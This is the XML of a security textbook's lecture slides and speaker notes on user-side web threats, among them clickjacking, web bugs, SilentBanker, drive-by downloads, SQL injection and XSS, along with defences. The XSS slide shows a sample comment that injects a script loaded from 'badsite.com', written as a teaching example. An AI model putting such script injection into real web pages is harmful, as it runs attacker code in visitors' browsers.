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 ContentType="image/tif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38" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="90" d="100"/>
          <a:sy n="90" d="100"/>
        </p:scale>
        <p:origin x="-80" y="-4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75A891-DC54-4746-B22F-2BF6FD228F15}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/14/15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43F8B3-902C-7043-9909-4F4D681E6C8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42059095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browsers have in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> many ways become our new operating systems, the increases in complexity and scrutiny can be seen in this chart of newly discovered browser vulnerabilities.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3093019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Unwanted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>rowser toolbars are an example that just about every</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> student will have had experience with.</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443572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 of this example attack is that the application returns the entire account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>s table from the database.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994051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Stored procedures effectively</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> separate SQL code from SQL data, thus preventing most SQL injection attacks.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3838100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education has become more scientific over the years,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> with products like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>PhishMe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> automating the user training process and focusing on the worst offenders. PGP and S/MIME are both solutions for encrypting and signing email.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4040265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types of browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> attack are</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> covered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> in more depth in the next few slides.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2668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SilentBanker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> was a Trojan that generally installed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> as a browser plug-in. When it detected the user going to a banking URL, it would intercept keystrokes and even modify them so that money transfers would go to attackers’ accounts.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4179421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CAPTCHAs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> are used by websites to defeat automation, such as by preventing spammers from scripting the creation of massive numbers of email accounts. By using dummy websites to entice users into solving CAPTCHAs, attackers can effectively defeat the CAPTCHAs at scale.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2269058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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> examples of these mechanisms are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>SecurID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> tokens, Google Authenticator, and text message codes. Driver signing is an example of using such techniques to mitigate local malware.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3532169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a fake banking website meant to trick users.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3652323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a software download site meant to trick users into downloading malicious applications.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201057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tiny image served up from one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>provider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ClicksRUs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>”) that allows user behavior to be tracked across many sites for advertising purposes. Students probably notice this when they see web ads that offer up items very similar to ones they’ve recently been shopping for on other sites. Web bugs can also be used to track users’ reading of advertising emails.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2701951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Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is a way of tricking users into providing desired input. The attacker makes the input dialog transparent and places an image with an enticement below the transparent dialog. The user ends up answering a question he didn’t even know he was being asked, unknowingly authorizing his computer to execute the attacker’s will. “Framing”—moving and layering HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>iframes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>—is an important component of this attack.</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4057366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EA922B-2215-48EC-BAD4-763D8DC31FBD}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/14/15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BA3A7911-63D7-2949-A6FE-FAC6D959B6EF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="421296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A9F05-E40C-4C63-A5A0-02A0D0FCAD91}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/14/15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BA3A7911-63D7-2949-A6FE-FAC6D959B6EF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2551783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55AAF-8BD6-40AB-9204-0C1919DD0120}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/14/15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BA3A7911-63D7-2949-A6FE-FAC6D959B6EF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3850538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44EFBD-D7B0-4ADD-B312-790185298B9C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>10/14/15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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10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733B8-2E51-43E2-A6FE-30A80ED91C2B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>10/14/15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878571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4B844-8D80-4CC8-BC3E-0F36256D853A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>10/14/15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a:xfrm>
            <a:off x="0"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6612460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62E9CB-564A-4E3D-8823-6F0EA9C8651E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>10/14/15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270887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7694D4-3FA3-48FA-9975-BB3B7880A0E0}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>10/14/15</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661650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C77511-1D3F-40A4-A0E6-2AD445C50AE5}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>10/14/15</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826544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9BDC1-9684-4CF7-AB07-E6F34A43E39E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>10/14/15</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684076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BE523-A45B-4CDC-854C-CAD0483D8D9D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>10/14/15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32104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82424-453A-46DD-A943-7FA58638B8A4}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/14/15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BA3A7911-63D7-2949-A6FE-FAC6D959B6EF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1188424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BA5D9-408C-45AD-B026-827FDAE3C891}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>10/14/15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962033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5BDE2-7403-4870-9342-00731EA7BBFB}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>10/14/15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800812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6B0D06-21BA-4D3D-BAAF-3329BC5CB483}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>10/14/15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6708578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02E21-29EB-4DD0-A716-53C9BC6A204B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>10/14/15</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288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70875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646D62-8479-4885-9C22-DD3399366253}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/14/15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BA3A7911-63D7-2949-A6FE-FAC6D959B6EF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="206735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3639E5-15E6-474D-ADB0-B5E9477FD883}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/14/15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BA3A7911-63D7-2949-A6FE-FAC6D959B6EF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="278443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A7B4C9-4295-48A8-BF9C-7B934D051C8F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/14/15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>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9" name="Slide Number Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BA3A7911-63D7-2949-A6FE-FAC6D959B6EF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13486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9D81E1-38FE-4B19-9B77-48E0222F2B7F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/14/15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>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5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BA3A7911-63D7-2949-A6FE-FAC6D959B6EF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="139191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BE77B-FD19-40B9-8BC3-B4FC72683978}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/14/15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>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4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BA3A7911-63D7-2949-A6FE-FAC6D959B6EF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148849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090B3-E587-4927-AD9B-4990930C5C63}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/14/15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BA3A7911-63D7-2949-A6FE-FAC6D959B6EF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="243788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BB7F9-0BA8-4A98-9943-027310139D2A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/14/15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BA3A7911-63D7-2949-A6FE-FAC6D959B6EF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38671647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E0DD6-D9D7-4040-9C0D-0E1EC7088D66}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/14/15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A7911-63D7-2949-A6FE-FAC6D959B6EF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2998324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F623DF0-8D64-43AC-AD8B-812C32AA2530}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>10/14/15</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3853463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t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t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t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t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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ecurity in Computing,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fifth Edition</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Chapter 4: The Web—User Side</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>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31104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Successful Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>The attacks listed above are largely failures of authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Can be mitigated with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Shared secret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>One-time password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Out-of-band communication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"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2" name="Footer Placeholder 1"/>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96485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Website</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="fig04-07.tif"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="181" b="1302"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1280246" y="1558153"/>
            <a:ext cx="6559236" cy="4811059"/>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63068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Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="fig04-08.tif"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-160" b="-2247"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1506498" y="1456844"/>
            <a:ext cx="6102405" cy="493776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382067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Bug</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="fig04-1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30" b="-669"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905622" y="1601270"/>
            <a:ext cx="5329328" cy="4796628"/>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33291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Clickjacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="fig04-13.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075" b="-8587"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1741469" y="1344703"/>
            <a:ext cx="5654408" cy="5335593"/>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74608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Drive-By Download</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code is downloaded, installed, and executed on a computer without the user’s knowledge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>May be the result of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, fake code, program download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>subsitution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, etc.</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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="fig04-14.t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96" y="4189432"/>
            <a:ext cx="8507506" cy="1279033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>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0191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Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tricking a client or server into executing scripted code by including the code in data inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cripts and HTML tags are encoded as plaintext just like user inputs, so they can take over web pages similarly to the way buffer overflow attacks can take </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>programs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Cool&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;story.&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>KCTVBigFan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>badsite.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>xss.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;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27267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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8378456" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
